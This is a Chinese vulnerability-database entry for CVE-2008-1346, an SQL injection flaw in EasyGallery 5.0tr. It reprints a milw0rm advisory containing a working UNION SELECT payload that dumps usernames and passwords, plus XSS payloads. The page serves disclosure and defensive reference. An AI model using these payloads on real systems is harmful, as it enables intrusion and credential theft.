| CVE-2008-1346 |
|
发布时间 :2008-03-17 12:44:00 | ||
| 修订时间 :2008-09-05 17:37:30 | ||||
| NMCOE |
[原文]SQL injection vulnerability in staticpages/easygallery/index.php in MyioSoft EasyGallery 5.0tr and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter in a category action.
[CNNVD]EasyGallery ‘index.php’ SQL注入漏洞 (CNNVD-200803-239)
MyioSoft EasyGallery中的staticpages/easygallery/index.php存在SQL注入漏洞。远程攻击者通过一个分类操作中的catid参数来执行任意SQL命令。
–
CVSS (基础分值)
| CVSS分值: | 7.5 | [严重(HIGH)] |
| 机密性影响: | PARTIAL | [很可能造成信息泄露] |
| 完整性影响: | PARTIAL | [可能会导致系统文件被修改] |
| 可用性影响: | PARTIAL | [可能会导致性能下降或中断资源访问] |
| 攻击复杂度: | LOW | [漏洞利用没有访问限制 ] |
| 攻击向量: | NETWORK | [攻击者不需要获取内网访问权或本地访问权] |
| 身份认证: | NONE | [漏洞利用无需身份认证] |
–
CWE (弱点类目)
| CWE-89 | [SQL命令中使用的特殊元素转义处理不恰当(SQL注入)] |
–
CPE (受影响的平台与产品)
| 产品及版本信息(CPE)暂不可用 |
–
OVAL (用于检测的技术细节)
| 未找到相关OVAL定义 |
–
官方数据库链接
–
其它链接及资源
|
http://www.securityfocus.com/bid/28233 (UNKNOWN) BID 28233 |
|
http://www.milw0rm.com/exploits/5247 (UNKNOWN) MILW0RM 5247 |
|
http://secunia.com/advisories/29372 (VENDOR_ADVISORY) SECUNIA 29372 |
|
http://xforce.iss.net/xforce/xfdb/41185 (UNKNOWN) XF easygallery-index-sql-injection(41185) |
|
http://www.securityfocus.com/archive/1/archive/1/489583/100/0/threaded (UNKNOWN) BUGTRAQ 20080314 EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities |
–
漏洞信息
| EasyGallery ‘index.php’ SQL注入漏洞 | |
| 高危 | SQL注入 |
| 2008-03-17 00:00:00 | 2008-09-05 00:00:00 |
| 远程 | |
| MyioSoft EasyGallery中的staticpages/easygallery/index.php存在SQL注入漏洞。远程攻击者通过一个分类操作中的catid参数来执行任意SQL命令。 | |
–
公告与补丁
|
目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本: http://myiosoft.com/ |
–
漏洞信息 (5247)
| EasyGallery <= 5.0tr Multiple Remote Vulnerabilities (EDBID:5247) | |
| php | webapps |
| 2008-03-12 | Verified |
| 0 | JosS |
N/A |
[点击下载] |
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ EasyGallery <= 5.0tr - Multiple Remote Vulnerabilities +==--
--==+====================================================================================+==--
[+] [JosS] + [Spanish Hackers Team] + [Sys - Project]
[+] Info:
[~] Software: EasyGallery
[~] HomePage: http://myiosoft.com
[~] Exploit: Multiple Remote Vulnerabilities [High]
[~] Bug Found By: JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Verified in localhost with EasyGallery 5.0tr and magic_quotes Off
[+] Remote SQL Injection:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?page=category&PageSection=0&catid=[SQL]
[~] Example: -1+union+all+select+1,2,3,concat(puUsername,char(54),puPassword),5,6,7,8,9,0,1+from+edp_puusers/*
[+] Cross Site Scripting in URI:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php/[XSS]
[~] Example: >">
[+] Cross Site Scripting:
[~] Vuln File: index.php
[~] Exploit: http://localhost/PATH/staticpages/easygallery/index.php?help=about&q=[XSS]
[~] Example: %22+onmouseover=alert("JosS")+
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
--==+ JosS +==--
--==+====================================================================================+==--
[+] [The End]
# milw0rm.com [2008-03-12]
–
漏洞信息
42866 |
|
| EasyGallery staticpages/easygallery/index.php catid Parameter SQL Injection | |
Remote / Network Access |
Information Disclosure, Input Manipulation |
| Loss of Confidentiality, Loss of Integrity |
Solution Unknown |
| Exploit Public | Uncoordinated Disclosure |
–
漏洞描述
| EasyGallery contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'staticpages/easygallery/index.php' script not properly sanitizing user-supplied input to the 'catid' variable. This may allow an attacker to inject or manipulate SQL queries in the back-end database. |
–
时间线
2008-03-12 |
Unknow |
| 2008-03-12 | Unknow |



![[测试]WEB日志审计工具 teler-微慑信息网-VulSee.com](https://vulsee.com/wp-content/uploads/2024/03/695a48b0bc02a11b7d41de2b76f6a7f9.png)






![[八卦] 王婷婷—揭秘一个大三女生的性爱录像-微慑信息网-VulSee.com](http://free.86hy.com/crack/pic/1.jpg)
![[随笔]今天国际警察节-微慑信息网-VulSee.com](http://photo.sohu.com/20041017/Img222528326.jpg)

青云网
